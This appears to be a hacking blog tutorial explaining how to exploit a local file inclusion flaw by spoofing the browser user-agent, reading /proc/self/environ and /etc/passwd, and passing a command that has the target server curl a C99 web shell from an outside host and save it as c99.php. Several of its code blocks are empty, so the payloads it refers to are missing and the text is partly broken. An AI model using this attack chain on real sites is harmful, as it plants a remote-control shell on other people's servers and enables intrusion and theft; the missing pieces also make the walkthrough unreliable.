Latest News

LFI ( Local File Inclusion ): How to upload SHELL ( C99 .txt )

Continuing to our post Step by Step guide for LFI (Local File Inclusion): The process of exploiting a website

Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about:config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:

Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox default string Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:


If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...
Instead of typing

Code:


as useragent,type this:

Code:


Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review... basicaly,you are just adding &cmd= thing at the end of url...
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php

And that's all for now...cheers!

Source: Pinoy

No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code